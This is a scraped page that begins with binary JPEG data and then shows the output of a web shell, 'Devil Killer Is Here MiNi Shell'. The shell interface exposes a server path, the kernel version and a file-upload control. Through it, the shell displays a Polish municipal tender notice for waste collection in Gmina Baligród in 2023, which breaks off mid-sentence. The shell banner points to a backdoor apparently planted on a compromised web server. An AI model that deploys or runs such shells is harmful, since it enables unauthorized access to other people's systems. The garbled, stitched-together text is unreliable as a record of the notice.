JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221024/0040599101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Baligród i ich zagospodarowanie w 2023r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BALIGRÓD</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440005</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Wolności 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Baligród</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-606</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">13 468 40 77</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">13 468 40 08</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@baligrod.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.baligrod.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Baligród i ich zagospodarowanie w 2023r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3cb68983-5378-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00405991</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00055608/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 odbiór odpadów komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/72ca6f80-893d-4528-8c26-4d404e44a48e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, oraz poczty elektronicznej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). 7. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przezwykonawcę będą przetwarzane<br/>zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Odbiór<br/>odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od<br/>właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady, położonych na<br/>obszarze Gminy Baligród i ich zagospodarowanie”<br/>Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a<br/>także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.b) Dane osobowe<br/>wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa<br/>w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do<br/>upływu terminu na ich wniesienie.<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych<br/>dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku<br/>postępowania o udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w<br/>art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16<br/>RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679.d) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy<br/>w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane<br/>osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b<br/>powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym<br/>innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IV.271.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Odbiór odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują<br/>mieszkańcy oraz od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a<br/>powstają odpady, położonych na obszarze Gminy Baligród i ich zagospodarowanie” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513000-6 - Usługi obróbki i usuwania odpadów, które nie są niebezpieczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. <br/>2.	Kryteria oceny ofert oparte są na systemie punktowym.<br/>3.	Zamawiający przy wyborze oferty będzie się kierował następującymi kryteriami oceny ofert:<br/>Kryterium I Cena – 60 pkt<br/>(Wartość zamówienia brutto – za dostawę całości przedmiotu zamówienia objętego <br/>poszczególnym zadaniem) <br/><br/>Przy czym, punkty te będą wyliczone wg następującego wzoru:<br/> najniższa cena zaproponowana w ofertach<br/>----------------------------------------------------------- x 60 = wartość punktowa<br/> cena badanej oferty <br/>Kryterium II Termin płatności faktury – 40 pkt<br/>Kryterium termin płatności faktury będzie liczone wg następujących zasad: <br/>	Termin płatności faktury do 14 dni od dnia dostarczenia Zamawiającemu – 0 pkt. <br/>	Termin płatności faktury od 15 do 20 dni włącznie od dnia dostarczenia Zamawiającemu – 10 pkt. <br/>	Termin płatności faktury od 21 do 25 dni włącznie od dnia dostarczenia Zamawiającemu – 20 pkt. <br/>	Termin płatności faktury od 26 do 30 dni włącznie od dnia dostarczenia Zamawiającemu – 40 pkt.<br/> Maksymalna ilość punktów za obydwa kryteria wynosi 100. Wszystkie obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku. <br/> Najkorzystniejsza oferta to ta która otrzyma największą ilość punktów <br/>4.	Jeżeli zostanie złożona tylko jedna oferta przez wykonawcę niewykluczonego z postępowania, która następnie nie zostanie odrzucona – Zamawiający może udzielić zamówienia temu wykonawcy.<br/>5.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.<br/>6.	Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>7.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego. <br/>8.	Zamawiający wybiera najkorzystniejsza ofertę w terminie związania oferta określonym w SWZ. <br/>9.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty. <br/>10. W przypadku braku zgody, o której mowa w pkt 9, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą̨ przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Dziale VII SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający uzna spełnienie przez Wykonawcę tego warunku, jeżeli ten wykaże, że jest<br/>wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym<br/>ma siedzibę lub miejsce zamieszkania.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>a) Zamawiający wymaga wpisu do ewidencji działalności regulowanej prowadzonej przez Wójta<br/>Gmina Baligród.<br/>b) Wpis do „Rejestru podmiotów, wprowadzających produkty, produkty w opakowaniach i<br/>gospodarujących odpadami (BDO)” prowadzonego przez Marszałka Województwa jako<br/>zbierający odpady lub przetwarzający odpady zgodnie z treścią zezwolenia oraz transportujący<br/>odpady w zakresie wszystkich odpadów objętych przedmiotem zamówienia.sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w tym zakresie.<br/>4) zdolność techniczna lub zawodowa:<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że:<br/>- dysponuje odpowiednim potencjałem technicznym tj.:<br/>1) Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany<br/>dysponować bazą magazynowo – transportową usytuowana na terenie Gminy Baligród, lub w<br/>odległości nie większej niż 60 km od granicy Gminy Baligród.a) Wyposażenie bazy magazynowo – transportowej,<br/>wyposażenie pojazdów, utrzymanie<br/>odpowiedniego stanu technicznego i sanitarnego pojazdów i urządzeń powinno spełniaćwymagania zawarte w<br/>Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 roku w<br/>sprawie szczegółowych wymagań w zakresie odbioru odpadów komunalnych od właścicieli<br/>nieruchomości (Dz. U. z 2013 r. poz.122 z późn. zm).<br/>2) Wykonawca zobowiązany jest przez cały okres obowiązywania umowy dysponować<br/>pojazdami w ilości niezbędnej do prawidłowej realizacji umowy, przystosowanymi do odbierania<br/>poszczególnych frakcji odpadów, w sposób wykluczający mieszanie się odpadów. W dyspozycji<br/>Wykonawcy winno być co najmniej:<br/>a) dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych,<br/>b) dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych,<br/>c)jeden pojazd przeznaczony do odbierania odpadów komunalnych z pojemników i kontenerów<br/>za pomocą dźwigu HDS.<br/>3) Wszystkie pojazdy przeznaczone do odbierania odpadów muszą posiadać system<br/>pozycjonowania satelitarnego umożliwiający sprawdzenie aktualnej lokalizacji pojazdów.<br/>4) Zamawiający wymaga, aby pojazdy wykorzystywane podczas realizacji zamówienia przez<br/>wykonawcę posiadały aktualne wymagane przepisami przeglądy, dopuszczenia, ubezpieczenia,<br/>były sprawne technicznie oraz spełniały wymogi stawiane w rozporządzeniu Ministra Środowiska<br/>z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów<br/>komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122 z późn. zm).<br/>Wykonawca dostarczy Zamawiającemu wykaz sprzętu, który będzie służył do realizacji<br/>zamówienia(Zał. nr 3 wykaz sprzętu –wzór) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis<br/>lub informacja z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Dziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający oświadcza, iż przewiduje możliwość istotnych zmian Umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co 